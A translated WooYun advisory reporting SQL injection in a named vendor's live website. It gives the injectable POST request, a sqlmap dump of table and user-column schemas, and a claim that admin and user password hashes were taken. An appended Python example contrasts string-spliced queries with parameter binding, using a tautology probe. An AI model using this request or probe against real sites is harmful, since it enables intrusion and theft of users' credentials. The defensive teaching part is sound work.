Vulnerability summary

Defect ID: wooyun-2014-056592

Title: SQL injection vulnerability at Himedia (海美迪)

Vendor: Himedia (海美迪)

Author: bitcoin

Submitted: 2014-04-13 17:54

Fix deadline: 2014-05-28 17:55

Published: 2014-05-28 17:55

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-04-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-05-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Himedia is a startup focused on home video screen entertainment, a seasoned team with the ultimate imagination for the visual world. Shenzhen Himedia Technology Co., Ltd., founded in December 2005, is a high-tech enterprise specialising in multimedia application development. Its main products include smart network set-top boxes, IPTV set-top boxes, OTT devices, HD hard-disk media players and HD TV set-top boxes. It created the world's first Android network set-top box and is a leading brand of smart network set-top boxes in China.

Detailed description:

Injection page:
http://www.himedia-tech.cn
On the page where you enter your product serial number, the sn_number parameter is not properly filtered, which leads to SQL injection.
Enter 2222222222222, then capture the request:
POST /service_check.php HTTP/1.1
Host: www.himedia-tech.cn
Proxy-Connection: keep-alive
Content-Length: 46
Cache-Control: max-age=0
Origin: http://www.himedia-tech.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.himedia-tech.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: fang_sid=9237b8a132abc6275244778806561130; fang_lastvisit=1397135928; fang_userid=0; logtime=Yes; PHPSESSID=u7mjarsnm44ut37ng4akgrl1p5; SERVERID=9316eca6cad89c9e6735c89b31207174|1397135969|1397135928; Hm_lvt_866a4f0d3561bdee99db9ce30c05b85a=1397135937; Hm_lpvt_866a4f0d3561bdee99db9ce30c05b85a=1397135987; CNZZDATA2373077=cnzz_eid%3D633860561-1397135930-%26ntime%3D1397135930%26cnzz_a%3D4%26sin%3Dnone%26ltime%3D1397135937661
sn_number=2222222222222&cap_code=1092&x=25&y=4
Run sqlmap against this request:

[screenshot: 1.jpg]

[screenshot: 2.jpg]


Database: hmd
[60 tables]
+-----------------------------+
| agent |
| bid |
| center_type |
| content_type |
| emlog_attachment |
| emlog_blog |
| emlog_comment |
| emlog_link |
| emlog_options |
| emlog_reply |
| emlog_sort |
| emlog_tag |
| emlog_trackback |
| emlog_twitter |
| emlog_user |
| file |
| goods |
| goods_firmware |
| goodstype |
| help |
| help_class |
| help_message |
| images |
| jiameng |
| kfm_new_directories |
| kfm_new_files |
| kfm_new_files_images |
| kfm_new_files_images_thumbs |
| kfm_new_parameters |
| kfm_new_plugin_extensions |
| kfm_new_session |
| kfm_new_session_vars |
| kfm_new_settings |
| kfm_new_tagged_files |
| kfm_new_tags |
| kfm_new_translations |
| kfm_new_users |
| product_query |
| sessions |
| sessionvars |
| share_project |
| share_project_type |
| site_msg |
| site_settings |
| users |
| wp_commentmeta |
| wp_comments |
| wp_in_series_3_0_11_auth |
| wp_in_series_3_0_11_entries |
| wp_in_series_3_0_11_series |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_relatedposts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------------+
Database: hmd
Table: users
[62 columns]
+---------------------------+---------------+
| Column | Type |
+---------------------------+---------------+
| admin_deny | mediumint(8) |
| admin_good | mediumint(8) |
| bid_current_id | int(11) |
| buy_files | mediumint(10) |
| customer_group_permission | text |
| document_box_files | mediumint(8) |
| document_request | mediumint(8) |
| download_files | mediumint(8) |
| download_files_able | mediumint(8) |
| english | smallint(1) |
| favorite_files | mediumint(8) |
| income_account | decimal(10,2) |
| level_in_company | smallint(1) |
| login_times | mediumint(8) |
| out_account | decimal(10,2) |
| permission | varchar(255) |
| point | decimal(10,2) |
| question_answered | int(5) |
| sell_files | mediumint(8) |
| upload_files | mediumint(8) |
| upload_passed_files | mediumint(8) |
| upload_unpassed_files | mediumint(8) |
| upload_waiting_files | mediumint(8) |
| user_allowemails | tinyint(1) |
| user_answer | varchar(255) |
| user_career | varchar(6) |
| user_company | varchar(255) |
| user_department | varchar(20) |
| user_email | varchar(255) |
| user_emailshow | tinyint(1) |
| user_entrance_date | varchar(4) |
| user_extension | varchar(6) |
| user_homepage | varchar(255) |
| user_id | mediumint(8) |
| user_idcard | varchar(18) |
| user_intro | text |
| user_introshow | tinyint(1) |
| user_invisible | tinyint(1) |
| user_joindate | int(11) |
| user_lastaction | int(11) |
| user_lastvisit | int(11) |
| user_level | smallint(6) |
| user_location | varchar(255) |
| user_mobile | varchar(20) |
| user_msn | varchar(60) |
| user_name | varchar(30) |
| user_password | varchar(255) |
| user_pdshow | tinyint(1) |
| user_photo | varchar(255) |
| user_province | varchar(6) |
| user_qq | varchar(15) |
| user_question | varchar(255) |
| user_recommend | char(1) |
| user_scshow | tinyint(1) |
| user_sex | tinyint(1) |
| user_sexshow | tinyint(1) |
| user_state | char(1) |
| user_telephone | varchar(13) |
| user_title | varchar(8) |
| user_truename | varchar(10) |
| user_truenameshow | tinyint(1) |
| user_type | char(1) |
+---------------------------+---------------+

[screenshot: 5.jpg]


From this table I obtained the password information of 20 users, including admin; I won't crack them here!

Proof of vulnerability:

As above

Fix recommendation:

Filter it. Any gifts?
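The recommendation above says only "filter". As an added example, not code from the report or from the vendor's site, the following Python models a serial-number lookup like the one behind service_check.php against an in-memory SQLite table. It puts the string-splicing pattern that produces this class of bug next to a hardened version that binds sn_number as a query parameter and allowlists its 13-digit format, and it shows that binding alone already neutralises the input even without the format check. The table name product_query is taken from the dumped schema list; its columns, the sample rows, the 13-digit format rule and the SQLite backend are assumptions.

```python
"""Serial-number lookup: the unsafe pattern behind the sn_number bug, beside a hardened one.

Added example, not the report's or the vendor's code. The table name product_query comes
from the dumped schema; its columns, the sample rows and the SQLite backend standing in for
the site's MySQL database are assumptions.
"""
import re
import sqlite3

# Constructed sample data (assumption): three registered products.
SAMPLE_ROWS = [
    ("2222222222222", "HD600A", "2013-11-02"),
    ("3333333333333", "Q5", "2014-01-15"),
    ("4444444444444", "HD900B", "2014-03-20"),
]

# The serial on the page is 13 digits; treat that as the allowlisted format (assumption).
SN_PATTERN = re.compile(r"[0-9]{13}")


def make_db() -> sqlite3.Connection:
    """Create the in-memory table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE product_query (sn_number TEXT PRIMARY KEY, model TEXT, sold_on TEXT)"
    )
    conn.executemany("INSERT INTO product_query VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def is_valid_sn(sn_number: str) -> bool:
    """Allowlist check: exactly 13 ASCII digits, nothing else."""
    return SN_PATTERN.fullmatch(sn_number) is not None


def lookup_vulnerable(conn: sqlite3.Connection, sn_number: str) -> list:
    """The defect class the report describes: the raw value is spliced into the SQL
    text, so the input can change the structure of the query."""
    sql = (
        "SELECT sn_number, model, sold_on FROM product_query "
        "WHERE sn_number = '%s'" % sn_number
    )
    return conn.execute(sql).fetchall()


def lookup_bound_only(conn: sqlite3.Connection, sn_number: str) -> list:
    """Parameter binding alone: the value travels separately from the SQL text and is
    compared as data, so a tautology in it matches no row."""
    sql = "SELECT sn_number, model, sold_on FROM product_query WHERE sn_number = ?"
    return conn.execute(sql, (sn_number,)).fetchall()


def lookup_hardened(conn: sqlite3.Connection, sn_number: str) -> list:
    """Defense in depth: reject malformed serials before they reach the database,
    then bind the value as a parameter."""
    if not is_valid_sn(sn_number):
        raise ValueError("serial number must be exactly 13 digits")
    return lookup_bound_only(conn, sn_number)


if __name__ == "__main__":
    db = make_db()
    # A tautology in the input: the kind of probe a scanner such as sqlmap starts from.
    probe = "x' OR '1'='1"
    print("vulnerable, probe  :", lookup_vulnerable(db, probe))   # every row leaks
    print("bound only, probe  :", lookup_bound_only(db, probe))   # []
    print("hardened, valid sn :", lookup_hardened(db, "2222222222222"))
    try:
        lookup_hardened(db, probe)
    except ValueError as err:
        print("hardened, probe    : rejected ->", err)
```

The parameter binding is the fix that actually closes the injection; the format check is a second, independent layer that also gives the application a clean place to log and rate-limit malformed serial submissions, which is what a defender would watch for in the web server logs after a report like this one.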

Copyright notice: when reprinting, please credit the source: bitcoin@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.